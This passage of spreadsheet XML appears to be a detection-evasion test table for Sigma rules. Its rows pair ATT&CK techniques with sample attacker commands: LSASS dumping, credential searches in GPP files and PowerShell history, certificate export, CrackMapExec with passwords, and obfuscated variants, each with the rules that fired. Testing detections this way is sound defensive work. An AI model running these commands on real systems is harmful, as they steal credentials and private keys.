      <c r="I681" s="43" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language (12fbff88-16b5-4b42-9754-cd001a789fb3)</t>
        </is>
      </c>
      <c r="J681" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K681" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="682" ht="15.75" customHeight="1" s="42">
      <c r="A682" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B682" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C682" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D682" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E682" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 755\r\n</t>
        </is>
      </c>
      <c r="F682" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G682" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I682" s="43" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f); HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f)</t>
        </is>
      </c>
      <c r="J682" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K682" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="683" ht="15.75" customHeight="1" s="42">
      <c r="A683" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B683" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C683" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D683" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E683" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 755 | echo bypass</t>
        </is>
      </c>
      <c r="F683" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G683" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I683" s="43" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f)</t>
        </is>
      </c>
      <c r="J683" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K683" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="684" ht="15.75" customHeight="1" s="42">
      <c r="A684" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B684" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C684" s="43" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D684" s="43" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E684" s="43" t="inlineStr">
        <is>
          <t>findstr /S /I cpassword \\THAIMX\sysvol\*.xml</t>
        </is>
      </c>
      <c r="F684" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I684" s="43" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords (91a2c315-9ee6-4052-a853-6f6a8238f90d)</t>
        </is>
      </c>
      <c r="J684" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K684" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="685" ht="15.75" customHeight="1" s="42">
      <c r="A685" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B685" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C685" s="43" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D685" s="43" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E685" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist | findstr /i lsass.exe</t>
        </is>
      </c>
      <c r="F685" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I685" s="43" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE (fe63010f-8823-4864-a96b-a7b4a0f7b929)</t>
        </is>
      </c>
      <c r="J685" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K685" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="686" ht="15.75" customHeight="1" s="42">
      <c r="A686" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B686" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C686" s="43" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D686" s="43" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E686" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist | findstr /R "lsass"</t>
        </is>
      </c>
      <c r="F686" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G686" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I686" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE (47e4bab7-c626-47dc-967b-255608c9a920)</t>
        </is>
      </c>
      <c r="J686" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K686" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="687" ht="15.75" customHeight="1" s="42">
      <c r="A687" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B687" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C687" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D687" s="43" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E687" s="43" t="inlineStr">
        <is>
          <t>icacls "C:\\Program Files\*" 2&gt;nul | findstr "Everyone"</t>
        </is>
      </c>
      <c r="F687" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I687" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE (47e4bab7-c626-47dc-967b-255608c9a920)</t>
        </is>
      </c>
      <c r="J687" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K687" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="688" ht="15.75" customHeight="1" s="42">
      <c r="A688" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B688" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C688" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D688" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E688" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.100 --local-auth --username Administrator --password "P@ssw0rd123!" -x whoami</t>
        </is>
      </c>
      <c r="F688" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G688" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I688" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J688" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K688" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="689" ht="15.75" customHeight="1" s="42">
      <c r="A689" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B689" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C689" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D689" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E689" s="43" t="inlineStr">
        <is>
          <t>cme.exe</t>
        </is>
      </c>
      <c r="F689" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G689" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I689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689" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K689" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="690" ht="15.75" customHeight="1" s="42">
      <c r="A690" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B690" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C690" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D690" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E690" s="43" t="inlineStr">
        <is>
          <t>cme smb 172.16.10.5/24 -u 'user' -p 'pass' --local-auth</t>
        </is>
      </c>
      <c r="F690" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G690" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I690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690" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K690" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="691" ht="15.75" customHeight="1" s="42">
      <c r="A691" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B691" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C691" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D691" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E691" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.0/24 -u"Administrator" -p"Password123!" --local-auth -x"whoami"</t>
        </is>
      </c>
      <c r="F691" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G691" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I691" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J691" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K691" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="692" ht="15.75" customHeight="1" s="42">
      <c r="A692" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B692" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_packet_capture</t>
        </is>
      </c>
      <c r="C692" s="43" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D692" s="43" t="inlineStr">
        <is>
          <t>d3c3861d-c504-4c77-ba55-224ba82d0118</t>
        </is>
      </c>
      <c r="E692" s="43" t="inlineStr">
        <is>
          <t>netsh   trace    start   capture=yes tracefile=C:\Users\thaim\AppData\Local\Temp\trace.etl maxsize=10</t>
        </is>
      </c>
      <c r="F692" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I692" s="43" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE (d3c3861d-c504-4c77-ba55-224ba82d0118)</t>
        </is>
      </c>
      <c r="J692" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K692" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="693" ht="15.75" customHeight="1" s="42">
      <c r="A693" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B693" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C693" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D693" s="43" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E693" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Content -Path '$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' | Select-String 'password', '-p', 'key', 'pwd', 'pass'"</t>
        </is>
      </c>
      <c r="F693" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I693" s="43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J693" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K693" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="694" ht="15.75" customHeight="1" s="42">
      <c r="A694" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B694" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C694" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D694" s="43" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E694" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "gc $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt | sls 'password'"</t>
        </is>
      </c>
      <c r="F694" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I694" s="43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J694" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K694" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="695" ht="15.75" customHeight="1" s="42">
      <c r="A695" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B695" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C695" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D695" s="43" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E695" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Content (Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt') | Select-String 'pass'"</t>
        </is>
      </c>
      <c r="F695" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I695" s="43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J695" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K695" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="696" ht="15.75" customHeight="1" s="42">
      <c r="A696" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B696" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C696" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D696" s="43" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E696" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Content -Path $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt | Where-Object { $_ -match 'password' }"</t>
        </is>
      </c>
      <c r="F696" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I696" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File (f4ff7323-b5fc-4323-8b52-6b9408e15788); Potential PowerShell Console History Access Attempt via History File (f4ff7323-b5fc-4323-8b52-6b9408e15788)</t>
        </is>
      </c>
      <c r="J696" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K696" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="697" ht="15.75" customHeight="1" s="42">
      <c r="A697" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B697" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C697" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D697" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E697" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Export-PfxCertificate -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F697" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I697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697" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K697" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="698" ht="15.75" customHeight="1" s="42">
      <c r="A698" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B698" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C698" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D698" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E698" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'Export-PfxCertificate' -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F698" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G698" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I698" s="43" t="inlineStr">
        <is>
          <t>Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4); Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4)</t>
        </is>
      </c>
      <c r="J698" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K698" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="699" ht="15.75" customHeight="1" s="42">
      <c r="A699" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B699" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C699" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D699" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E699" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; Export-PfxCertificate -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F699" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I699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699" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K699" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="700" ht="15.75" customHeight="1" s="42">
      <c r="A700" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B700" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C700" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D700" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E700" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificate -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F700" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I700" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell (9e716b33-63b2-46da-86a4-bd3c3b9b5dfb); Certificate Exported Via PowerShell (9e716b33-63b2-46da-86a4-bd3c3b9b5dfb); Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J700" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K700" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="701" ht="15.75" customHeight="1" s="42">
      <c r="A701" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B701" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C701" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D701" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E701" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias epfx Export-PfxCertificate; epfx -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F701" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G701" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I701" s="43" t="inlineStr">
        <is>
          <t>Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4); Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4)</t>
        </is>
      </c>
      <c r="J701" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K701" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="702" ht="15.75" customHeight="1" s="42">
      <c r="A702" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B702" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C702" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D702" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E702" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Export-Certificate -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.cer"</t>
        </is>
      </c>
      <c r="F702" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I702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702" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K702" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="703" ht="15.75" customHeight="1" s="42">
      <c r="A703" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B703" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C703" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D703" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E703" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.cer"</t>
        </is>
      </c>
      <c r="F703" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I703" s="43" t="inlineStr">
        <is>
          <t>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703" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K703" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="704" ht="15.75" customHeight="1" s="42">
      <c r="A704" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B704" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C704" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D704" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E704" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Export-PfxCertificate -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx -Password (ConvertTo-SecureString -String 'P@ssw0rd' -AsPlainText -Force)"</t>
        </is>
      </c>
      <c r="F704" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I704" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine (74403157-20f5-415d-89a7-c505779585cf); Certificate Exported Via PowerShell (9e716b33-63b2-46da-86a4-bd3c3b9b5dfb); Certificate Exported Via PowerShell (9e716b33-63b2-46da-86a4-bd3c3b9b5dfb); Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4); Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4)</t>
        </is>
      </c>
      <c r="J704" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K704" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="705" ht="15.75" customHeight="1" s="42">
      <c r="A705" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B705" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C705" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D705" s="43" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E705" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "gps lsass | Out-Minidump"</t>
        </is>
      </c>
      <c r="F705" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I705" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS (b2815d0d-7481-4bf0-9b6c-a4c48a94b349); PowerShell Get-Process LSASS (b2815d0d-7481-4bf0-9b6c-a4c48a94b349); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J705" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K705" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="706" ht="15.75" customHeight="1" s="42">
      <c r="A706" s="43" t="inlineStr">
        <is>
